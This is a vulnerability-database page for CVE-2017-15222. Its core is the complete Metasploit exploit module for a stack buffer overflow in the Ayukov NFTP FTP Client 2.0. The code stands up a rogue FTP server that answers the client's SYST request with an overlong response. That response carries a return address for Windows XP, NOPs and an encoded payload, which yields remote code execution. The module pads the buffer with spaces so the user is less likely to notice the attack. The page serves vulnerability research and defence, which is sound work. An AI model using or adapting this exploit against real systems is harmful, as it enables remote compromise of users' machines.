Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Ayukov NFTP FTP Client 2.0 - Remote Buffer Overflow (Metasploit)

🗓️ 05 Jan 2018 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 38 Views

Ayukov NFTP FTP Client 2.0 - Remote Buffer Overflow (Metasploit) handling a stack-based buffer overflow vulnerability in Ayukov NFTP FTP Client 2.0 and prior versions, allowing for denial-of-service or remote code execution under user context

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Ayukov NFTP FTP Client < 2.0 - Buffer Overflow Exploit
23 Oct 201700:00
zdt
0day.today		Ayukov NFTP FTP Client 2.0 - Buffer Overflow Exploit
7 Jan 201800:00
zdt
0day.today		Ayukov NFTP FTP Client 2.0 - Buffer Overflow Exploit
2 Jan 201900:00
zdt
0day.today		Ayukov NFTP client 1.71 - (SYST) Buffer Overflow Exploit
4 Nov 201900:00
zdt
ATTACKERKB		Ayukov NFTP FTP Client Stack Buffer Overflow Analysis
24 Oct 201700:00
attackerkb
Circl		CVE-2017-15222
21 Oct 201700:00
circl
CNVD		Ayukov NFTPD Buffer Overflow Vulnerability
25 Oct 201700:00
cnvd
Check Point Advisories		Ayukov NFTPD Buffer Overflow Remote Code Execution (CVE-2017-15222)
7 Apr 202000:00
checkpoint_advisories
CVE		CVE-2017-15222
24 Oct 201717:00
cve
Cvelist		CVE-2017-15222
24 Oct 201717:00
cvelist
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::TcpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Ayukov NFTP FTP Client Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow vulnerability against Ayukov NFTPD FTP
          Client 2.0 and earlier. By responding with a long string of data for the SYST request, it
          is possible to cause a denail-of-service condition on the FTP client, or arbitrary remote
          code exeuction under the context of the user if successfully exploited.
      },
      'Author'   =>
        [
          'Berk Cem Goksel',  # Original exploit author
          'Daniel Teixeira',  # MSF module author
          'sinn3r'            # RCA, improved module reliability and user exp
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2017-15222'],
          [ 'EDB', '43025' ],
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00\x01\x0a\x10\x0d",
          'StackAdjustment' => -3500
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
    [ 'Windows XP Pro SP3 English', { 'Ret' => 0x77f31d2f } ], # GDI32.dll v5.1.2600.5512
        ],
      'Privileged'     => false,
      'DefaultOptions' =>
        {
      'SRVHOST' => '0.0.0.0',
        },
      'DisclosureDate' => 'Oct 21 2017',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]),
      ])
  end

  def exploit
    srv_ip_for_client = datastore['SRVHOST']
    if srv_ip_for_client == '0.0.0.0'
      if datastore['LHOST']
        srv_ip_for_client = datastore['LHOST']
      else
        srv_ip_for_client = Rex::Socket.source_address('50.50.50.50')
      end
    end

    srv_port = datastore['SRVPORT']

    print_status("Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}")
    super
  end

  def on_client_connect(client)
    return if ((p = regenerate_payload(client)) == nil)
    print_status("#{client.peerhost} - connected")

    # Let the client log in
    client.get_once

    print_status("#{client.peerhost} - sending 331 OK")
    user = "331 OK.\r\n"
    client.put(user)

    client.get_once
    print_status("#{client.peerhost} - sending 230 OK")
    pass = "230 OK.\r\n"
    client.put(pass)

    # It is important to use 0x20 (space) as the first chunk of the buffer, because this chunk
    # is visible from the user's command prompt, which would make the buffer overflow attack too
    # obvious.
    sploit = "\x20"*4116

    sploit << [target.ret].pack('V')
    sploit << make_nops(10)
    sploit << payload.encoded
    sploit << Rex::Text.rand_text(15000 - 4116 - 4 - 16 - payload.encoded.length, payload_badchars)
    sploit << "\r\n"

    print_status("#{client.peerhost} - sending the malicious response")
    client.put(sploit)

    client.get_once
    pwd = "257\r\n"
    client.put(pwd)
    client.get_once

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Jan 2018 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
CVSS 3.19.8
EPSS0.81586
ayukov nftpftp clientbuffer overflowmetasploitremotestack-basedvulnerabilitydenial-of-serviceremote code executionexploitwindows xp pro sp3 englishgdi32.dll v5.1.2600.5512cve-2017-15222edb-43025tcp server
38